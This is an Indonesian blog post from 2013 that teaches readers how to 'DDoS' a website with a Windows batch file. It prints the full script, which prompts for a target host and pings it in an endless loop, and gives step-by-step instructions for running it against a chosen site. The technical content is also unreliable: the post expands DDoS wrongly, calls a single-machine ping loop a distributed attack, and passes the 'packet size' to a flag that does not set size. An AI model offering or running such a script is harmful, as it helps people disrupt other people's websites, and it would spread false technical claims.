Pengumuman:= Hay. Maaf, bila postingan diblog ini ada hasil Copy paste dari blog lain.. Tetapi saya sudah memasukan Link Sumber nya disetiap postingan yang saya copy paste(y), bila ada kritik,saran atau keluhan silahkan Kontak saya Alhamim Dwi Putra. Terimakasih.
Minggu, 07 April 2013

Cara DDOS Website Dengan Menggunakan CMD



Cara DDOS Website Dengan Menggunakan CMDDDOS ( Denial Distribute of services ) Attack, mungkin adalah serangan yang paling simple di lakukan namun efeknya sangat berbahaya. Situs-situs besar seperti yahoo.com , ebay.com , hotmail.com, e-gold.com , 2checkout.com dan lain-lain pernah mengalami serangan yang mengakibatkan situs nya tidak bisa di akses selama beberapa jam.

Yang terbaru adalah situs e-gold.com pada tahun 2005 kemarin, situs nya di serang dengan memakai metode DDOS ( Denial Distribute of services ).

Nah kali ini saya akan kasih tau Cara DDOS Website Dengan Menggunakan CMD. 
Langsung saja ..

  1. Buka Notepad
  2. Copy Paste Script Dibawah ini ke Notepad.
    @echo off

    mode 67,16
    title DDOS Attack By http://alhamimdwiputra.blogspot.com/
    color 0b
    cls
    echo.
    echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
    echo DDOS With Batchfile By http://alhamimdwiputra.blogspot.com/
    echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
    echo.
    set /p x=Server-Target:
    echo.
    echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
    ping %x%
    echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
    @ping.exe 127.0.0.1 -n 5 -w 1000 > nul
    goto Next
    :Next
    echo.
    echo.
    echo.
    set /p m=ip Host:
    echo.
    set /p n=Packet Size:
    echo.
    :DDOS
    color 0d
    echo Attacking Server %m%
    ping %m% -i %n% -t >nul
    goto DDOS
  3. Kemudian Save As Menggunakan Extensi .Bat contoh Putra.Bat / DDoS.bat
  4. Kalau udh di save buka hasil save an yang tadi, terus masukin situs yang mau di DDoS tekan ENTER.
  5. Kalau udah kita hajar lagi masukin ip host nya. kalo udah masukin IP hostnya biasanya dia minta Packet size tulis aja 100000 atau 10000000 terserah kalian Tekan ENTER.
  6. Setelah itu akan melakukan DDoS pada ip host yang bersangkutan.
Udah selesai, mudahkan? Semoga bermanfaat ..

Sebaiknya berkomentarlah dengan baik, sopan, dsb.
Tidak mengandung kata-kata kotor atau sara.
bila anda melanggar tidak segan kami hapus komentarnya dengan cepat.